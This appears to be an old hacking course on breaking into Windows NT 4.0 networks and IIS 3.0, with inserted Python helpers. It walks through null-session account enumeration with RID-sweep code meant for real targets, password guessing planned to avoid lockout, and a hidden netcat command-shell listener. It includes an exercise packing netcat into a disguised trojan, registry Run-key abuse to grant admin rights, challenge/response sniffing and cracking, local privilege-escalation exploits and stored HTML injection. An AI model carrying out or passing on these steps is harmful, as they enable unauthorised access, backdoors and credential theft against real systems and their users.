No command Lists the resource domains of the master domain.
Must be used without any master domain name.

/TRUST          Establish a trust relationship between the
                resource domain and the master domain.
                The resource domain is the current domain or the
                domain specified along with the option /DOMAIN.
                Resets the secure channel if the trust
                relationship was previously existing.

                A password can be specified in the command line.
                If no password is defined then a default password
                is used (eg, the resource domain name in lower
                case and limited to 14 characters).

/DELETE Removes the Master Domain.

/QUERY          Queries the master domain information on the
                resource domain PDC and checks the secure
                channel.

NETDOM Resource
Commands are as follows:

Command Description
-----------------------------------------------------------------------
No command Lists the resource domains of the master domain.
Must be used without any domain resource name.

/ADD Adds an account for the resource domain.

                A password can be specified in the command line.
                If no password is defined then a default password
                is used (eg, the resource domain name in lower
                case and limited to 14 characters).

/DELETE Removes the account for the resource domain.

/QUERY          Queries the resource domain account. Checks the
                secure channel between the resource domain and
                the master domain.

Example:

E:\RESKIT>netdom /d:aerie resource
NetDom 1.7 @1997. Written by Christophe Robert (chrisrob@microsoft.com).

Searching PDC for domain AERIE ...
Found PDC \\SWALLOW
Connecting to \\SWALLOW ...
Listing resource domains of AERIE ...

Resource Domain 1 = FLOCKER

In this example, a null IPC connection was made to \\SWALLOW, and an lmhosts entry exists
that lists:

172.16.101.203 SWALLOW #PRE #DOM:AERIE

This way, your attack machine knows the IP address and the domain association of \\SWALLOW.

USER2SID

User2sid is a program that converts usernames into SIDs (Security Identifiers). This program can
be used over a null IPC$ connection.

The usage of this program is as follows:

Evgenii Rudnyi (C) All rights reserved, 1998
Chemistry Department, Moscow State University
119899 Moscow, Russia, http://www.chem.msu.su/~rudnyi/welcome.html
rudnyi@comp.chem.msu.su
This utility is freeware and in public domain. Feel free to use and
distribute it. Optionally, provided you like the utility,
you may send me a bottle of beer.

Disclaimer of warranty:
This utility is supplied as is. I disclaim all warranties,
express or implied, including, without limitation, the warranties of
merchantability and of fitness of this utility for any purpose. I assume
no liability for damages direct or consequential, which may result from
the use of this utility.

The goal of the utility is to obtain SID from the account name, usage:
user2sid [\\computer_name] account_name
where computer_name is optional. By default, the search
starts at a local Windows NT computer.

For example:

C:\>user2sid \\172.16.101.200 guest

S-1-5-21-1577673719-892752668-604069369-501

Number of subauthorities is 5
Domain is AERIE
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

This will show you the SID of the Guest user. If a guest user does not exist on the server, try
other accounts, like Administrator or IUSR_MACHINENAME.

SID2USER

Sid2user is a program which converts a SID into a username.

Evgenii Rudnyi (C) All rights reserved, 1998


Chemistry Department, Moscow State University
119899 Moscow, Russia, http://www.chem.msu.su/~rudnyi/welcome.html
rudnyi@comp.chem.msu.su
This utility is freeware and in public domain. Feel free to use and
distribute it. Optionally, provided you like the utility,
you may send me a bottle of beer.

Disclaimer of warranty:
This utility is supplied as is. I disclaim all warranties,
express or implied, including, without limitation, the warranties of
merchantability and of fitness of this utility for any purpose. I assume
no liability for damages direct or consequential, which may result from
the use of this utility.

The goal of the utility is to obtain the account name from SID, usage:
sid2user [\\computer_name] authority subauthority_1 ...
where computer_name is optional. For example,
sid2user 5 32 544
By default, the search starts at a local Windows NT computer.

For example:

C:\>sid2user \\172.16.101.200 5 21 1577673719 892752668 604069369 501

Name is Guest
Domain is AERIE
Type of SID is SidTypeUser

This shows the username associated with the SID. For this example we used the SID returned by
user2sid in the previous example. Note that the leading "S-1" (the SID revision) is dropped: the
arguments start with the identifier authority "5", and the dashes (-) are replaced with spaces.

Getting Userlists

SID reversal

An SID (security identifier) is the unique number Windows NT assigns to each security principal.
The last field of a user SID is the relative identifier (RID); everything before it identifies the
domain or machine and is the same for every account on it. RIDs are handed out sequentially. When an
NT server is first installed, the built-in accounts receive well-known RIDs starting at 500
(Administrator is 500, Guest is 501). Accounts that administrators add after installation receive
RIDs starting at 1000.

For example:

A freshly installed server may have the following users:

User Name            Last SID digits (RID)
-----------------------------------------------
Administrator        500
Guest                501

Once the server is installed, an administrator adds more users in the following order:

User Name            Last SID digits (RID)
-----------------------------------------------
User1                1000
User2                1001
User3                1002
BackupOperator       1003

Notice that the last field of the SID increments by one each time an account is added, that the
built-in accounts start at 500, and that accounts created after the install start at 1000. Groups
created by the administrator are allocated from the same counter, so a sweep will also turn up group
SIDs; sid2user reports those with a "Type of SID" other than SidTypeUser.

Using this knowledge, we can use the sid2user and user2sid tools to perform more information
gathering, specifically determining usernames on the server.

1. Connect to the target machine with a null IPC$ connection.

2. Run user2sid against the target machine with a username that is almost certain to exist, such
as Guest or Administrator:

C:\>user2sid \\IP_ADDRESS Administrator

(S-1-5-21-1577673719-892752668-604069369-500 is returned)

3. Feed the SID returned above into sid2user. Begin with the 5, replace the dashes with spaces,
and change only the last field from 500 to 501:

C:\>sid2user \\IP_ADDRESS 5 21 1577673719 892752668 604069369 501

If you typed the domain portion of the SID correctly, the "Name is Guest" response should be
shown, since 501 is the well-known RID of the Guest account. This confirms that you typed in
the SID correctly.

4. Now continue running sid2user, incrementing the last field of the SID by one each time. A
"LookupSidName failed - no such account" response means that no account holds that RID. Because
deleted accounts leave holes (NT never reuses a RID), a single failure does not mark the end of
the list: sweep the whole range starting at 500, then the whole range starting at 1000, and record
every name you get back. This is a list of the accounts on the server.
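The sweep described in steps 2 to 4, as an added example written in Python around the user2sid/sid2user output shown above. It is not part of the original course material or of the two tools. The lookup function is injected, so the same code can drive a real sid2user invocation or, as here, a constructed fake domain (the account set, including the deleted RID 1002, is invented for the example).

```python
# Added example: RID sweep ("SID reversal") around the user2sid/sid2user
# output format shown above. Not part of the course material or the tools.

WELL_KNOWN_RIDS = range(500, 600)   # built-in accounts: Administrator 500, Guest 501, ...
CREATED_RIDS = range(1000, 1100)    # accounts and groups added after installation
NO_SUCH_ACCOUNT = "LookupSidName failed - no such account"


def parse_sid(sid):
    """Split 'S-1-5-21-a-b-c-rid' into (identifier authority, domain subauthorities, RID)."""
    parts = sid.strip().split("-")
    if len(parts) < 4 or parts[0].upper() != "S" or parts[1] != "1":
        raise ValueError("not a textual SID: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return authority, subs[:-1], subs[-1]


def sid2user_args(sid, rid=None):
    """Arguments sid2user expects: drop 'S-1', keep the rest, dashes become spaces.
    Passing rid rewrites the last field so the same domain SID can be re-used."""
    authority, domain_subs, own_rid = parse_sid(sid)
    rid = own_rid if rid is None else rid
    return [str(authority)] + [str(s) for s in domain_subs] + [str(rid)]


def parse_sid2user_output(text):
    """Turn 'Name is Guest' / 'Domain is AERIE' / 'Type of SID is SidTypeUser' into a dict."""
    fields = {}
    for line in text.splitlines():
        if " is " in line:
            key, value = line.split(" is ", 1)
            fields[key.strip()] = value.strip()
    return fields


def sweep_rids(seed_sid, lookup, ranges=(WELL_KNOWN_RIDS, CREATED_RIDS), max_gap=None):
    """Enumerate accounts by rewriting the RID of seed_sid and asking sid2user.

    lookup(args) must return the text sid2user prints for that argument list.
    Deleted accounts leave holes and RIDs are never reused, so by default the
    whole of each range is swept; max_gap=N instead gives up on a range after
    N+1 consecutive misses. Returns (rid, name, sid type) for every hit.
    """
    found = []
    for rng in ranges:
        misses = 0
        for rid in rng:
            out = lookup(sid2user_args(seed_sid, rid))
            if NO_SUCH_ACCOUNT in out:
                misses += 1
                if max_gap is not None and misses > max_gap:
                    break
                continue
            misses = 0
            fields = parse_sid2user_output(out)
            found.append((rid, fields.get("Name"), fields.get("Type of SID")))
    return found


# Constructed stand-in for a target reached over a null IPC$ session. The
# account set is invented; RID 1002 was "deleted" to show a hole in the sequence.
FAKE_DOMAIN_SID = "S-1-5-21-1577673719-892752668-604069369"
FAKE_PREFIX = ["5", "21", "1577673719", "892752668", "604069369"]
FAKE_ACCOUNTS = {
    500: ("Administrator", "SidTypeUser"),
    501: ("Guest", "SidTypeUser"),
    512: ("Domain Admins", "SidTypeGroup"),
    1000: ("User1", "SidTypeUser"),
    1001: ("User2", "SidTypeUser"),
    1003: ("BackupOperator", "SidTypeUser"),
}


def fake_sid2user(args):
    """Behaves like sid2user run against the constructed domain above."""
    rid = int(args[-1])
    if args[:-1] != FAKE_PREFIX or rid not in FAKE_ACCOUNTS:
        return NO_SUCH_ACCOUNT
    name, kind = FAKE_ACCOUNTS[rid]
    return "Name is %s\nDomain is AERIE\nType of SID is %s" % (name, kind)


if __name__ == "__main__":
    seed = FAKE_DOMAIN_SID + "-500"          # what user2sid returned for Administrator
    print("sid2user", " ".join(sid2user_args(seed, 501)))
    for rid, name, kind in sweep_rids(seed, fake_sid2user):
        print(rid, name, kind)
```

Against a real target, replace fake_sid2user with a function that runs sid2user with the argument list and returns its output. With the default max_gap=None the code does what Splinter does (sweep the fixed ranges); max_gap=1 reproduces the "stop at the first failure" shortcut of step 4 and, in the constructed domain, misses the Domain Admins group at RID 512.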

EnumUsers (QTIP)

Using another technique, usernames can be retrieved across a null IPC$ session with the EnumUsers
API call. The tool "qtip" uses this technique.

To use qtip, simply run the utility with the name of the target machine:

C:\>qtip \\SWALLOW

(a vulnerable server will list all usernames)

EnumUsers: (net users)

The EnumUsers API call can also be leveraged by the "net users" command, provided that you are:

1. Running on Windows NT Workstation
2. Currently a member of the domain you are attacking

If both of these conditions hold, the command

Net users /domain

will return a list of users in the domain.

Splinter

Splinter automates the process of SID reversal. A kludge of a program written by Johnny, it
takes some of the pain out of SID reversing.

Supply the target hostname…

SIDs are reversed automatically from 500-599 and 1000-1099. More SIDs can be coded into the
userlist.pl program…

A list of users on the target box is returned. A file is also created in the format IP_ADDRESS.out
which contains the same list.

Ntinfo
The Hydra support tool “ntinfo” creates a NULL (default) IPC connection and makes remote RPC
calls against a target NT box. These RPC calls query the user, group and auditing information on
the target box.

Using this information, the following can be determined:

Complete user list
Complete group list
Complete user auditing information:
    Account lockout
    Date last used
    Date created
    Number of bad logins
    Number of logins

NTSplitter

The Hydra support tool ntsplitter performs both SID reversal and the EnumUsers technique. In
addition, ntsplitter creates output files that are compatible with the Hydra support tool "deflogin".
Deflogin performs password guessing when supplied with a list of usernames. By default, deflogin
attempts the passwords username, null and "password" against each user account.

For example, if the username "Administrator" is supplied to deflogin without password options, the
following passwords will be attempted:

administrator
<NULL>
password

All attempts are LANMAN authentication attempts, which makes every password attempt
case-insensitive.

In addition, ntsplitter pulls the gecos (user information) field for each user, and will try each word
in the user information field as long as the account has enough bad password tries left.

Ntsplitter pulls the bad password count for each user and compares it with the lockout threshold.
This keeps ntsplitter from locking out accounts on the target.

Important note: the deflogin program is not aware of account lockout information; ntsplitter is.
This means that you can lock out an account by running deflogin more than once with the same
ntsplitter output file.
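The guess list deflogin tries, trimmed the way ntsplitter trims it, as an added Python example. This is not the Hydra deflogin or ntsplitter code; the account records (name, gecos field, bad password count) and the lockout threshold are constructed for the example, whereas on a real target they would come from the ntinfo/ntsplitter enumeration described above.

```python
# Added example (not the Hydra deflogin/ntsplitter code): per-account guess
# lists cut to the number of failures each account can still absorb.
import re


def candidates(username, gecos="", extra=()):
    """Ordered, de-duplicated guesses for one account: the username, the null
    password, "password", then every word of the user information (gecos)
    field. LANMAN authentication uppercases the password and ignores anything
    past 14 characters, so guesses are normalised the same way before
    duplicates are dropped."""
    seen = set()
    out = []
    words = [username, "", "password"] + re.findall(r"[A-Za-z0-9]+", gecos) + list(extra)
    for w in words:
        key = w.lower()[:14]
        if key not in seen:
            seen.add(key)
            out.append(key)
    return out


def safe_attempts(bad_pwd_count, lockout_threshold):
    """Failures the account can still absorb without locking.
    A threshold of 0 means lockout is disabled (returns None: no limit). One
    attempt is kept in reserve so the real user's next typo does not lock them."""
    if lockout_threshold == 0:
        return None
    return max(0, lockout_threshold - bad_pwd_count - 1)


def plan(accounts, lockout_threshold):
    """accounts: dicts with name, gecos and bad_pwd_count.
    Returns {username: guesses to try}, cut to the per-account budget."""
    result = {}
    for acct in accounts:
        guesses = candidates(acct["name"], acct.get("gecos", ""))
        budget = safe_attempts(acct.get("bad_pwd_count", 0), lockout_threshold)
        result[acct["name"]] = guesses if budget is None else guesses[:budget]
    return result


# Constructed sample, not real enumeration output.
SAMPLE_ACCOUNTS = [
    {"name": "Administrator",
     "gecos": "Built-in account for administering the computer/domain",
     "bad_pwd_count": 0},
    {"name": "joe", "gecos": "Joe Bloggs, Accounting 4412", "bad_pwd_count": 3},
    {"name": "svc_backup", "gecos": "", "bad_pwd_count": 4},
]

if __name__ == "__main__":
    # "Lockout after 5 bad logon attempts" in User Manager's account policy
    for user, guesses in plan(SAMPLE_ACCOUNTS, lockout_threshold=5).items():
        print(user, guesses)
```

The budget is recomputed from the current bad password count every time the plan is built, which is exactly the property deflogin lacks: re-running the same plan file without re-reading the counts would spend the reserve twice. Note that on NT 4 the built-in Administrator account is exempt from lockout unless the administrator has enabled it with passprop, so for that account the budget is a courtesy rather than a hard limit.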

Username/Password Guessing

IPC connections

Using IPC$ connections along with your obtained userlists, it is now possible to attempt
username and password combinations against the target machine.

For example:

C:\> net use \\IP_ADDRESS\IPC$ "foo" /user:"joe"

System error 1326 has occurred.

Logon failure: unknown user name or bad password.

This indicates that the username or password was wrong.

C:\> net use \\IP_ADDRESS\IPC$ "goodpassword" /user:"joe"

The command completed successfully.

This indicates that the username and password were correct!

Use this technique to test username and password combinations on the target server. Remember
to delete the old IPC$ connection (net use with the /delete switch) before trying a new one, since NT
refuses a second set of credentials to the same server from one session. Every failed attempt raises
the account's bad password count, so check the lockout policy (see the ntsplitter notes above)
before guessing.

Netbios Auditing Tool (NAT)

A more efficient technique involves the use of the NetBIOS Auditing Tool (NAT). NAT has many
functions, including:

• Displaying browse listings
• Displaying workstation information
• Displaying user information
• Displaying name tables
• Attempting username/password combinations against a target

In addition, if NAT successfully guesses a username/password combination, it will display
information about what privileges that account has.

The usage of NAT is as follows:

[*] NAT - NetBIOS Auditing Tool v2.0


Copyright 1996, 1997, 1998, Secure Networks Inc.

usage: nat [options] <address>


-u <file> Specify userlist textfile (default 'userlist.txt')
-p <file> Specify password textfile (default 'passlist.txt')
-g Guess only username as password, do not use passlist
-n Only dump remote name tables
-b Do not dump browse listing
-w Do not dump workstation information
-i Do not dump user information
-s Do not perform share security checks
-l <num> Specify the number of parallel password (default 20)
grinding processes to use when guessing passwords
-o <file> Specify a filename to write all output to

Note: When using a password list and a userlist, keep in mind that every password in the
password list is attempted against every username in the userlist. Bear in mind that when NAT
finds a valid password, it stops and does not continue with any other users in your list. To resume,
delete from the userlist all of the users up to and including the one whose password was found, and
run NAT again.

It is generally easier to use the -g option first, to find accounts whose password is the same as
the username. Once that is finished, follow with a -u -p run.

Example:

Att~# nat -u userlist.txt -p passlist.txt 172.16.101.200

Fill in the userlist.txt file with the usernames gathered in the previous section.
A sample passlist.txt may contain:

password

This will attempt the word "password" on every user in the list.

Exploitation Techniques

Netcat

Now that you have access to username/password combinations, and access to a share, it would
help to have access to a command prompt. Since a telnet server is not installed with NT, we can
use an alternative, such as netcat, written by *hobbit*.

Netcat usage:

[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]


-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

A very easy way to set up a basic telnet server is with this command line:

C:\> nc -t -d -e cmd.exe -l -p 99

This will run a telnet server listening on port 99, running cmd.exe once connected, detached from
the console (stealthy).

Try running this server. What happens after you disconnect?

Try running with the -L option instead of -l. What does this do differently?

Trojan Planting: Elitewrap

Trojan horse programs are a common way of leveraging a greater level of access to a system. In
a nutshell, a program is executed which runs other commands in addition to its own. When a user
executes the trojanned program, all commands are executed as that user.

One common use of a trojan in NT involves the following scenario:

1. You gain write access to a share which contains commands.

2. Trojan one of the commands to run netcat listening on a port

3. The user runs the command, launching a “telnet-like” listener

4. Now, as an attacker, you can telnet into the NT server, and run commands, or move about
the system as that user.

A common program used to create custom trojans is called “Elitewrap”.

Elitewrap Usage:


(C) Tom "eLiTe" McIntyre, 1999
tom@dundeecake.demon.co.uk
http://www.dundeecake.demon.co.uk/elitewrap

Usage
=====
The eLiTeWrap archiver ("elitewrap.exe") is a command-line utility, used as
follows:

elitewrap.exe [scriptfile]

Running elitewrap.exe with no parameters will start the program ready to
receive input from the user. The on-screen prompts are descriptive enough that
little explanation should be necessary. However, I will run through them:

Prompt Response
------ --------
Enter name of output file: ] This is the packfile you want to create.
] Remember to specify a .exe extension, for
] example: "install.exe".

[If the file already exists you will be asked whether or not to overwrite it]

[Now each of the operations will be displayed, just for your reference, as
follows:]
Operations: 1 - Pack only
2 - Pack and execute, visible, asynchronously
3 - Pack and execute, hidden, asynchronously
4 - Pack and execute, visible, synchronously
5 - Pack and execute, hidden, synchronously
6 - Execute only, visible, asynchronously
7 - Execute only, hidden, asynchronously
8 - Execute only, visible, synchronously
9 - Execute only, hidden, synchronously

Enter package file #1: ] This is the name of the first file you
] want to pack, or execute. For example, to
] specify "go.exe" in the current directory
] you would just type "go.exe". To specify
] a file elsewhere on your system, specify
] a full path, for example:
] "c:\windows\calc.exe".

Enter operation: ] This is where you specify an operation,
] one of the single-digit numbers from the
] operation list above.
[Explanation:
"1" (pack only) will cause the file to be packed into the archive, and
extracted into a temporary directory when the packfile is run. A program that
is executed from the packfile after this can then manipulate it. This method
should be used for storing data files that cannot be executed.

"2"-"5" (pack and execute) will cause the file to be packed into the archive
and executed when the packfile is run. You can choose to start the program
visible or invisible, asynchronously (the packfile self-extractor will
continue when this program is running) or synchronously (execution of the
packfile will be stopped until this program has finished).

"6"-"9" (execute only) will NOT store the file in the packfile, but rely on
the file existing on the user's system - it could be an integral system
utility, like "notepad.exe", or it could have been extracted earlier. The
program will search the following places, in the following order, for these
files:
Current directory
Directory from where the packfile was started
System directories (NT uses 32-bit then 16-bit system directories)
Windows directory
All directories specified in the PATH environment variable

IMPORTANT: If you wish to pack and execute the same file twice or more in the
archive you must use an option from 2-5 the first time, and 6-9 subsequent
times. The file will already have been extracted, and so will be reused. Not
only does this save disk space, but specifying the same filename twice will
not work if the file is open (i.e. the program is running) the second time
the file is extracted. ]

Enter command line: ] If you specified an option "2"-"9" then
] you will be prompted for a command line.
] This is appended to the filename to
] form a complete command that will be
] executed. This could be used for starting
] WINHELP.EXE with your help file, for
] example. This is optional. Press Enter to
] skip this option.

Enter package file #2: ] You will now be asked for another file,
] then another, and so on. You can just
] press Enter at one of these prompts to
] stop adding files.

With many features, elitewrap makes an excellent trojan delivery tool for Windows NT.

Using Elitewrap, create a trojan program. As an exercise, create an executable that launches
netcat listening on a port:

Tips:

• Use asynchronous execution
• Hide the execution of the program
• You will need the netcat executable (NT version) on your local machine

Steps:

1. Run the elitewrap program

Enter name of output file:

2. Choose a name for your executable program. Use something innocuous.

Operations: 1 - Pack only
            2 - Pack and execute, visible, asynchronously
            3 - Pack and execute, hidden, asynchronously
            4 - Pack and execute, visible, synchronously
            5 - Pack and execute, hidden, synchronously
            6 - Execute only, visible, asynchronously
            7 - Execute only, hidden, asynchronously
            8 - Execute only, visible, synchronously
            9 - Execute only, hidden, synchronously

Enter package file #1:

3. Package file 1 should be the netcat program, nc.exe

Enter operation:

4. Select operation 3, "Pack and execute, hidden, asynchronously"

Enter command line:

5. Enter only the arguments of the nc.exe command line listed above (the part after nc.exe),
since elitewrap appends what you type to the filename to form the complete command.

Enter package file #2:

6. Press Enter at this prompt to stop adding files

All done :)

Now try executing your trojan program. Can you see the output? Can you telnet into your own
machine on port 99? What other commands could you trojan to gain more privileges?

Remote Attacks

Remote registry updates

Under Windows NT 4.0 Server and Workstation through SP4, the registry key

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

grants Everyone the "Set Value" permission by default. The values under this key name programs
that are executed whenever any user logs in at the console. The key can be updated remotely if you
have the necessary registry permissions (NT Server and Workstation set them by default; PDCs and
BDCs do not) and any user account on the target, since every account is a member of Everyone.

Connect to the remote machine as your captured account. A null connection won't work, because
remote registry access requires an authenticated user.

Then, using regread, we can dump a vulnerable registry's contents remotely:

Regdmp (from the NT Resource Kit) works similarly:

A properly protected registry elicits this response (error 5 is "access denied"):

REGDMP: Unable to open key '\registry\machine' (5)

However, it's much more interesting to set this key using regini:

The file regtest.ini contains the registry key and the values to add. In this case, the command will
add the Guest user to the Administrators group the next time an administrator logs in at the
console, because commands in the Run key execute with the privileges of the user who is logging in.

Notes: All commands in the Run key execute in parallel, not serially. Don't insert commands
that must run in a certain order, as the order cannot be guaranteed. For example, don't add one value
for net user /add and another for net localgroup /add: the localgroup command may finish before the
user exists and fail the first time it is run. If the steps depend on each other, put them in a single
value whose command line runs them in sequence.

Password Sniffing

Much like UNIX, Windows passwords can be sniffed. Unlike standard UNIX applications,
however, Microsoft generally does not send the password itself across the wire. What crosses the
wire in LAN Manager and NTLM authentication is a challenge from the server and the client's
response, which is computed from the hash of the user's password. That challenge/response pair
can certainly be sniffed off the wire, and it is enough to attack the password offline.

To make matters worse, this authentication information is sent more frequently than one might
think. Every time a user browses for resources, a NULL connection is first attempted to that
resource. If that fails, the user's username and a challenge/response derived from that user's
password are transmitted to the remote host in a second attempt to authenticate. Network browsing
occurs every time a user opens the "Network Neighborhood" desktop application.

A tool written by the l0pht (http://www.l0pht.com) called "l0phtcrack" performs dictionary and
brute-force attacks against these captured challenge/response pairs.

A Hydra support tool, "readpwd", has been developed to sniff these exchanges and output them in
a l0phtcrack-readable format.

This sniffer runs at the command line, and when used with the -o option, stores this data in a file
for import into l0phtcrack (see the section on running l0phtcrack).

Password Cracking – L0phtcrack

L0phtcrack is generally run from the Windows-based GUI:

In order to run L0phtcrack, you should have a decent dictionary, as well as a set of encrypted
password strings (password hashes or sniffed challenge/response pairs). The readpwd tool outputs
these strings as sniffed from the wire. Optionally, l0phtcrack allows you to dump password hashes
from a remote machine; this requires Administrator access on the remote machine.

Once you have opened a dictionary and a compatible list of encrypted passwords, you can set
the options for the crack. LanMan hashes are case-insensitive (the password is uppercased before
hashing) and are computed over two independent 7-character halves, so they fall quickly; NTLM
hashes are case-sensitive and cover the whole password. The hybrid crack adds characters to your
dictionary words. Brute force tries the entire keyspace, and can take a long time!

Once passwords have been cracked, l0phtcrack will display them to the user:

Local Advancement Attacks

GETADMIN

From the “www.ntsecurity.com” review of getadmin:

“The program, developed by Konstantin Sobolev, runs in a command window and adds the
specified user account to the Administrators group. No special permissions are required to
execute the program - which also works through a telnet session.

…the program works on a Primary Domain Controller (PDC), and will add local domain accounts
to the Administrators group.

This utility also works well against domain accounts. We were able to add users from another
domain into the Administrators group of the local machine.

We tested the program using "getadmin username" and "getadmin DOMAIN-NAME\username".
Both of these variations in command syntax worked, which could indicate several other
configurations where this program might also work.”

With access to a standard user account, the getadmin program can be used to obtain
Administrator-level privileges on an unpatched system. Microsoft fixed the flaw it relies on with a
hotfix released after Service Pack 3, so expect it to fail where that fix or a later service pack is
installed.

“SECHOLE”

From the “www.ntsecurity.com” review of sechole:

“The following describes how any normal (non-administrative) user on a Windows NT
system can instantly gain administrative control for the entire machine by running a
simple executable program.

Requirements: You need to have a machine running the retail/free build of Windows NT
4.0, 3.51, or even Windows NT 5.0 beta -- either Workstation or Server will do.

1. Login on your NT machine: Login as any non-admin user on the machine (even guest
account will do). You may verify that the logged in user does not possess admin privilege
at this time by trying to run the "windisk" program from the shell. This should fail since the
user does not have admin privilege.

2. Copy: After logging in, copy the software (sechole.exe and admindll.dll) onto your hard
disk in any directory that allows you write and execute access.

3. Run SecHole.Exe: After running the program, your system might become unstable or
possibly lock up.

4. Reboot the machine if necessary: You will see that the non-admin user now belongs to
the Administrators group. This means that the user has complete admin control over that
machine -- for instance, you will be able to run programs like "windisk", create new users,
delete existing users, install drivers, even format hard disks.

FURTHER COMMENTS FROM THE AUTHORS:

SECHOLE.EXE is designed only to work on the workstation/server machine it is
executed on. Using the same technique, it is possible to gain domain-level Administrator
control over the entire Windows NT network, provided certain other conditions are met.
The example program SECHOLE.EXE is not designed to demonstrate this additional
vulnerability.”

The sechole program is another example of a way to advance from user to administrator.
This particular exploit can cause instability in the target system, so use it with caution, and expect
it to fail where the post-SP3 sechole hotfix or a later service pack is installed.

Application Attacks

Microsoft Internet Information Server 3.0

Information Gathering (IG)

Standard IG techniques can be employed against IIS, including web crawling and data mining.
Web crawling software such as Web Snake and Black Widow provides a means for automated
link traversal and site mirroring. Automated site traversal simply loads a starting page
(index.html, default.htm) and recursively follows all links found on it, keeping a record
of all returned information. Site mirroring works in a similar fashion, the exception being that a
mirror makes a local copy of everything the site references. These techniques can be used to:

• Collect keywords from a site, and feed those keywords into a database for a larger scale Internet
IG session including HTTP, SMTP, FTP and InterNIC services
• Determine what CGI scripts are being used on a site without "read" access to the scripts directory
• Determine the complete directory structure of a site

When IIS is installed, several “sample” programs are installed by default. Generally, these files
are not removed, even if a site has implemented an entirely new web presence. These “sample”
files can be called by using direct URL references, even if the sample pages are not linked to the
new site. Some of these files can be used to gather information about the site, while others
provide other interesting features.

http://www.0wned.org/samples/isapi/srch.htm

This sample search engine searches the entire web site, including both the default IIS
directories, as well as any files that were installed after IIS was stood up. This allows you
to search for non-public html documents, and even backup files. Use this engine to
discover documents to use as new web crawling sources. Note that the default
configuration of this engine will not return any data for searches resulting in more than
250 hits.

http://www.0wned.org/iisadmin/default.htm:

This is the URL for the HTML version of the IIS Internet Service Manager. It enables remote
administration of all the IIS services, including WWW, Gopher and FTP. In order to select a
service to administer, you must first authenticate against the server. Exactly which accounts
are accepted is still under investigation; simply having the iisadmin virtual directory present
may not be enough, as the Administrator account cannot always log in remotely.

http://www.0wned.org/default.htm

This is the default page for IIS. Generally, sites will stand up an “index.html” document as
the default, so this page will still be accessible through direct URL reference. All of the
sample html pages, and the iisadmin utility can be referenced from this page if it exists.

http://www.0wned.org/samples/isapi/favlist.htm

This is one of the default applications IIS installs for you. This particular page presents a
"guestbook" type of input form with fields for a URL, a description, and your name. Once the
text is entered and processed by http://www.0wned.org/scripts/samples/favlist.dll, the user has
the option of viewing their entry in the appended "logbook", which sits by default at
http://www.0wned.org/samples/isapi/drop.htm. The favlist.dll application is interesting in
that it will gleefully insert your text into an HTML document in the following fashion:

<b>Description:</b>Your text here<br>

Because the input is not escaped, a user can simply insert their own HTML tags and text into
the fields, and the drop.htm screen will render them as HTML, not text. For example, if the user
were to enter '<A HREF="www.playboy.com">Click Here For Cool Stuff</A>' into the description
field, drop.htm would show a link which, if clicked, would take the user to www.playboy.com.
This simple manipulation allows the user to create entire web pages, served under the target's
own host name, which could be accessed through the drop.htm reference. Anything else HTML can
carry, including script, can be injected the same way, and every later visitor to drop.htm receives it.
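The favlist.dll behaviour described above, as an added Python example that is not the sample's own code: a minimal stand-in for the logbook that drop.htm displays, rendered once the way favlist.dll does (raw insertion into the template shown above) and once with the input escaped. The entry text is constructed, modelled on the link injection in the text.

```python
# Added example (not favlist.dll's code): raw insertion versus escaped
# insertion of a guestbook entry into the <b>Description:</b>...<br> template.
import html

ENTRY_TEMPLATE = "<b>Description:</b>%s<br>"


def render_entry_vulnerable(description):
    """What favlist.dll effectively does: the submitted text becomes markup."""
    return ENTRY_TEMPLATE % description


def render_entry_safe(description):
    """Escape &, <, > and quotes so the text is displayed, not interpreted."""
    return ENTRY_TEMPLATE % html.escape(description, quote=True)


class Logbook:
    """Stand-in for the appended drop.htm: every entry is stored and shown to
    every later visitor, which is what makes the injection persistent."""

    def __init__(self, escape=True):
        self.render = render_entry_safe if escape else render_entry_vulnerable
        self.entries = []

    def add(self, description):
        self.entries.append(description)

    def page(self):
        return "\n".join(self.render(e) for e in self.entries)


# Constructed input, modelled on the link injection described above.
INJECTED = '<A HREF="www.playboy.com">Click Here For Cool Stuff</A>'

if __name__ == "__main__":
    for escape in (False, True):
        book = Logbook(escape=escape)
        book.add("A harmless entry")
        book.add(INJECTED)
        print("escape=%s\n%s\n" % (escape, book.page()))
```

The escaped version shows the visitor the literal angle brackets, so the logbook still works as a guestbook but no longer lets one contributor author the page that the next one loads. The URL field of the real form needs the same treatment plus a check that the value is an http URL, since it ends up inside an href attribute.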

IIS 3.0 WWW Server Default Files and Directories:

Volume in drive D has no label.
Volume Serial Number is 906C-EA32

Directory of D:\InetPub\wwwroot

01/19/99 08:24a <DIR> .
01/19/99 08:24a <DIR> ..
10/13/96 08:38p 4,051 default.htm
01/08/99 07:58a <DIR> samples
4 File(s) 4,051 bytes

Directory of D:\InetPub\wwwroot\samples

01/08/99 07:58a <DIR> .
01/08/99 07:58a <DIR> ..
01/08/99 07:58a <DIR> dbsamp
10/13/96 08:38p 4,051 default.htm
10/13/96 08:38p 838 disclaim.htm
01/08/99 07:58a <DIR> gbook
01/08/99 07:58a <DIR> htmlsamp
01/08/99 07:58a <DIR> images
01/08/99 07:58a <DIR> isapi
01/08/99 07:58a <DIR> sampsite
10 File(s) 4,889 bytes

Directory of D:\InetPub\wwwroot\samples\dbsamp

01/08/99 07:58a <DIR> .
01/08/99 07:58a <DIR> ..
10/13/96 08:38p 5,150 dbsamp.htm
10/13/96 08:38p 583 dbsamp1.htm
10/13/96 08:38p 743 dbsamp2.htm
10/13/96 08:38p 762 dbsamp3.htm
6 File(s) 7,238 bytes

Directory of D:\InetPub\wwwroot\samples\gbook

01/08/99 07:58a <DIR> .
01/08/99 07:58a <DIR> ..
10/13/96 08:38p 1,547 query.htm
10/13/96 08:38p 1,643 register.htm
4 File(s) 3,190 bytes

